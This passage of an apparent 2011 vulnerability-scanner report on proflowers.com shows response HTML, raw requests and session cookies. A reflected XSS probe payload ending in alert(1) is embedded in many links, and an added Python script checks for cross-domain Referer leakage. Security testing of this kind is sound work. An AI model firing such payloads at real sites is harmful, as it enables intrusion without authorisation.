.personalcreations.com/gifts/Wedding-Crock-30020976?viewpos=2&amp;trackingpgroup=PHMPG04&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0026339b?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Wedding Crock" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl3_productlist__ctl0__ctl1__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-5_0.gif" border="0" />
           <span id="_ctl11_rptProductGroups__ctl3_productlist__ctl0__ctl1__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
ts/Wine-Inspired-Photography-Framed-Prints-30019837?viewpos=3&amp;trackingpgroup=PHMPG04&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D01X_103184_W1?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Wine Inspired Photography Framed Prints" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl3_productlist__ctl0__ctl2__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_4.gif" border="0" />
           <span id="_ctl11_rptProductGroups__ctl3_productlist__ctl0__ctl2__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
alcreations.com/gifts/Heart-Wedding-Canvas-30015295?viewpos=4&amp;trackingpgroup=PHMPG04&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008345X_49771_W1_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Heart Wedding Canvas" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl3_productlist__ctl0__ctl3__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_8.gif" border="0" />
           <span id="_ctl11_rptProductGroups__ctl3_productlist__ctl0__ctl3__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
tions.com/gifts/To-Have-and-To-Hold--Frame-30021347?viewpos=5&amp;trackingpgroup=PHMPG04&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000009D209_087948_W1_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="To Have and To Hold Frame" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl3_productlist__ctl0__ctl4__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_6.gif" border="0" />
           <span id="_ctl11_rptProductGroups__ctl3_productlist__ctl0__ctl4__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
onalcreations.com/gifts/Puzzle-Name-Stools-30012047?viewpos=1&amp;trackingpgroup=PHMPG05&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000001125X_023117_W1_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Puzzle Name Stools" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl4_productlist__ctl0__ctl0__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_7.gif" border="0" />
           <span id="_ctl11_rptProductGroups__ctl4_productlist__ctl0__ctl0__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
nalcreations.com/gifts/Baby-Alphabet-Quilt-30016554?viewpos=2&amp;trackingpgroup=PHMPG05&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007G437_68702_W1_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Baby Alphabet Quilt" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl4_productlist__ctl0__ctl1__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_5.gif" border="0" />
           <span id="_ctl11_rptProductGroups__ctl4_productlist__ctl0__ctl1__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
ifts.personalcreations.com/gifts/Rag-Dolls-30016264?viewpos=3&amp;trackingpgroup=PHMPG05&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000007G150X_68104_W1_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Rag Dolls" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl4_productlist__ctl0__ctl2__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_7.gif" border="0" />
           <span id="_ctl11_rptProductGroups__ctl4_productlist__ctl0__ctl2__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
.com/gifts/Upholstered-Rocker-with-Ottoman-30017015?viewpos=4&amp;trackingpgroup=PHMPG05&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0071881?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Upholstered Rocker with Ottoman" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl4_productlist__ctl0__ctl3__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_8.gif" border="0" />
           <span id="_ctl11_rptProductGroups__ctl4_productlist__ctl0__ctl3__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
sonalcreations.com/gifts/Pewter-Baby-Plate-30021404?viewpos=5&amp;trackingpgroup=PHMPG05&amp;tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000009G877_92524_W1_SQ?nanos=770&amp;qlt=75,0&amp;resMode=sharp&amp;op_usm=0.5,1.0,0.0,0&amp;wid=174&amp;hei=174" alt="Pewter Baby Plate" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl11_rptProductGroups__ctl4_productlist__ctl0__ctl4__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_8.gif" border="0" />
           <span id="_ctl11_rptProductGroups__ctl4_productlist__ctl0__ctl4__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
er Your Email Here
                   " id="_ctl12__ctl0_emailInput" class="textBox" onclick="javascript:this.value=&#39;&#39;;" onkeypress="return CaptureEnterInEmailEntry(footerClientID)" />
<img onclick="SetEmailEntryUrl()" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/personalcreations/images/Go_Btn.gif" alt="Sign Up for Email Savings" border="0" />
</div>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="margin-left:5px;vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
<li><a rel="nofollow" href="https://accounts.proflowers.com/ManageOrderHistory.aspx?Ref=HomeNoRef&amp;cobrand=pcr">My Account</a>
...[SNIP]...
<li><a rel="nofollow" href="https://accounts.proflowers.com/ManageOrderHistory.aspx?Ref=HomeNoRef&amp;cobrand=pcr">Order Tracking</a>
...[SNIP]...
<li><a border="0" href="http://www.providecommerce.com/Careers_Overview.aspx">Careers</a>
...[SNIP]...
<li><a border="0" href="http://www.providecommerce.com/privacy.aspx">Privacy & Security</a>
...[SNIP]...
<li><a border="0" href="http://www.providecommerce.com/terms.aspx">Terms Of Use</a>
...[SNIP]...
<li><a border="0" href="http://content.yudu.com/A1ribh/2011Spring2/resources/index.htm" target="_blank">View Catalog Online</a>
...[SNIP]...
<li><a href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/PersonalCreations/images/PCR_ApparelSizeCharts.pdf" target="_blank">Apparel Size Charts</a>
...[SNIP]...
<li><a href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/PersonalCreations/images/PCR_Ringsize.pdf" target="_blank">Ring Size Charts</a>
...[SNIP]...
</p>
<a title="The freshest flowers, guaranteed to last at least 7 days." border="0" rel="nofollow" href="http://www.proflowers.com/?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:35px;width:120px;"><img class="footerLogo_PFC" height=35px width=120px class="footerLogo_PFC" height="35px" width="120px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The freshest flowers, guaranteed to last at least 7 days." border="0" /></a> <a title="A wide selection of green and exotic plants, perfect for gift and home d..cor." border="0" rel="nofollow" href="http://www.proplants.com/?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:35px;width:110px;"><img class="footerLogo_PLA" height=35px width=110px class="footerLogo_PLA" height="35px" width="110px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="A wide selection of green and exotic plants, perfect for gift and home d..cor." border="0" /></a> <a title="International flower delivery" border="0" rel="nofollow" href="http://www.proflowers.com/international?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:35px;width:128px;"><img class="footerLogo_PFCint" height=35px width=128px class="footerLogo_PFCint" height="35px" width="128px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="International flower delivery" border="0" /></a>
<a title="The place for unique and personalized gifts." border="0" rel="nofollow" href="http://www.redenvelope.com/?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:35px;width:151px;"><img class="footerLogo_RED" height=35px width=151px class="footerLogo_RED" height="35px" width="151px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The place for unique and personalized gifts." border="0" /></a>
<a title="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:35px;width:160px;"><img class="footerLogo_CMF" height=35px width=160px class="footerLogo_CMF" height="35px" width="160px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" /></a>
...[SNIP]...
zed gifts for life...s special occasions." border="0" href="http://www.personalcreations.com/?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:35px;width:177px;"><img class="footerLogo_PCR" height="35px" width="177px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Unique personalized gifts for life...s special occasions." border="0" /></a>
<a title="Gourmet hand-dipped berries, cookies and cakes." border="0" href="http://www.berries.com/?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" style="height:35px;width:83px;"><img class="footerLogo_SHB" height=35px width=83px class="footerLogo_SHB" height="35px" width="83px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Gourmet hand-dipped berries, cookies and cakes." border="0" /></a>
...[SNIP]...
<div class="OtherBrands XSmallSize">
           Other Liberty Media Brands and Services:
           <a id="_ctl12__ctl0_FooterLink_berries" href="http://www.berries.com">Hand-Dipped Strawberries</a>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<br/><a class="Underlined" onclick="" href="http://www.facebook.com/personalcreations">Personal Creations Facebook</a><br/><a class="Underlined" onclick="" href="http://twitter.com/pcgifts">Personal Creations Twitter</a><br/><a class="Underlined" onclick="" href="http://www.linkedin.com/company/personal-creations">Personal Creations Linked-In</a>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
       <img src="http://link.mercent.com/image.ashx?merchantID=ProFlowers" style="display: none;">
   </noscript>
...[SNIP]...
</span>


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/certona/resxclsa.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...

16.29. http://www.proflowers.com/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.proflowers.com
Path:   /default.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:
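The issue detail above is the scanner's cross-domain Referer leakage check: the page was requested with a query string (here the `tile` parameter still carries the reflected `alert(1)` payload from the earlier findings), and the response links to other hosts, so a user who follows one of those links hands the full referring URL, query string included, to that third party. The script below is an added example, not part of the report or of any Burp/XSS.CX tooling; it re-implements that check in Python. The request URL is the one in the Request section; the HTML is a constructed cut-down sample modelled on the anchors visible in the response dump. It assumes the browser behaviour of the report's era (no `Referrer-Policy` support: full Referer on http to http, http to https and https to https navigations, suppressed only on an https to http downgrade or with `rel="noreferrer"`), and it treats any differing hostname, including a sibling subdomain, as "another domain".

```python
from html.parser import HTMLParser
from urllib.parse import urlparse, urljoin

# Request line from the report, payload included.
PAGE_URL = ("http://www.proflowers.com/default.aspx"
            "?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef")

# Constructed sample body modelled on the anchors in the response dump (not the full page).
SAMPLE_HTML = """
<a href="http://www.proflowers.com/radio/default.aspx?Ref=HomeNoRef">Radio</a>
<a href="https://accounts.proflowers.com/ManageOrderHistory.aspx?Ref=HomeNoRef">My Account</a>
<a href="http://www.floristexpress.net?refcode=PFC&amp;LinkLocation=NavBar">Local Florist Delivery</a>
<a href="https://cdn.mercent.com/js/tracker.js">tracker</a>
<a rel="noreferrer" href="http://www.bridesign.com">Wedding</a>
<script src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js"></script>
<a href="/mothers-day-flowers-MDF?tile=hmpg_hero1&amp;Ref=HomeNoRef">Mother's Day</a>
"""


class LinkCollector(HTMLParser):
    """Collect navigable <a href> targets with their rel tokens (attribute entities are decoded)."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag != "a":
            return  # only user-followable navigations send a Referer for this page
        a = dict(attrs)
        if a.get("href"):
            self.links.append((a["href"], (a.get("rel") or "").lower().split()))


def host_of(netloc):
    """Hostname without userinfo or port; subdomains count as different hosts (assumption)."""
    return netloc.rsplit("@", 1)[-1].split(":")[0].lower()


def referer_leaks(page_url, html):
    """Return the cross-domain link targets that would receive page_url in the Referer header.

    Browser policy assumed (pre-Referrer-Policy, as in 2011): the full URL is sent for
    http->http, http->https and https->https; nothing is sent on an https->http downgrade
    or when the anchor carries rel="noreferrer".
    """
    src = urlparse(page_url)
    if not src.query:
        return []  # no query string, so nothing beyond the path to leak
    collector = LinkCollector()
    collector.feed(html)
    leaks = []
    for href, rel in collector.links:
        target = urlparse(urljoin(page_url, href))
        if target.scheme not in ("http", "https"):
            continue  # javascript:, mailto: etc. are not navigations that carry a Referer
        if host_of(target.netloc) == host_of(src.netloc):
            continue  # same host: not cross-domain
        if "noreferrer" in rel:
            continue  # author opted out of sending a Referer
        if src.scheme == "https" and target.scheme == "http":
            continue  # downgrade: Referer suppressed by default
        leaks.append(target.geturl())
    return leaks


if __name__ == "__main__":
    for url in referer_leaks(PAGE_URL, SAMPLE_HTML):
        print("leaks query string to:", url)
```

Running it lists the three third-party targets that would learn the `tile` value (the payload, or any session token or tracking identifier a site puts in its URLs); the `rel="noreferrer"` link and the same-host links are correctly skipped. Two caveats for anyone re-running this today: the check needs the real response body rather than the constructed sample, and current browsers default to `strict-origin-when-cross-origin`, which strips the path and query from cross-origin Referers, so the fix on the server side is to send an explicit `Referrer-Policy` header (or `rel="noreferrer"` on the links) and, more fundamentally, to keep anything sensitive out of the query string.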

Request

GET /default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef HTTP/1.1
Host: www.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253Aproductgroup%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.proflowers.com%25252Fdefault.aspx%25253Ftile%25253Dhmpg_hero16c36a%2525255c%25252522%2525253balert(1)%2525252f%2525252fdecb137eb0b%252526Ref%25253DHo%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:17:43 GMT
Content-Length: 95799


<noscript>
<div class="splashBox">
   <font style="font-size:16pt;color: #fff786;margin: 10px;">We&rsquo;re Sorry - </font>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not ha
...[SNIP]...
<p>
   1) Enable Javascript. To find out how: <A href="https://www.google.com/support/adsense/bin/answer.py?answer=12654" target="_blank">click here</a>
...[SNIP]...
<head><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_common.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_brandfonts.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_default.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_lockdown.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><title>
...[SNIP]...
<meta name="msvalidate.01" content="77940E049C181974C3AA656C72688B4C" />


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div id="innerContainer">
                    <link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<a border="0" rel="nofollow" href="http://www.proflowers.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:31px;width:120px;"><img height=31px width=120px height="31px" width="120px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<a border="0" rel="nofollow" href="http://www.proflowers.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PF_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="proPlantsLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.proplants.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:31px;width:121px;"><img height=31px width=121px height="31px" width="121px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.proplants.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PP_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="redEnvelopeLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.redenvelope.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:31px;width:145px;"><img height=31px width=145px height="31px" width="145px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.redenvelope.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/RED_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="personalCreationLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:31px;width:170px;"><img height=31px width=170px height="31px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PC_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="cherryMoonFarmsLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:31px;width:170px;"><img height=31px width=170px height="31px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/CMF_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="berriesLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.berries.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:31px;width:130px;"><img height=31px width=130px height="31px" width="130px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.berries.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&amp;Ref=HomeNoRef" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/SB_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
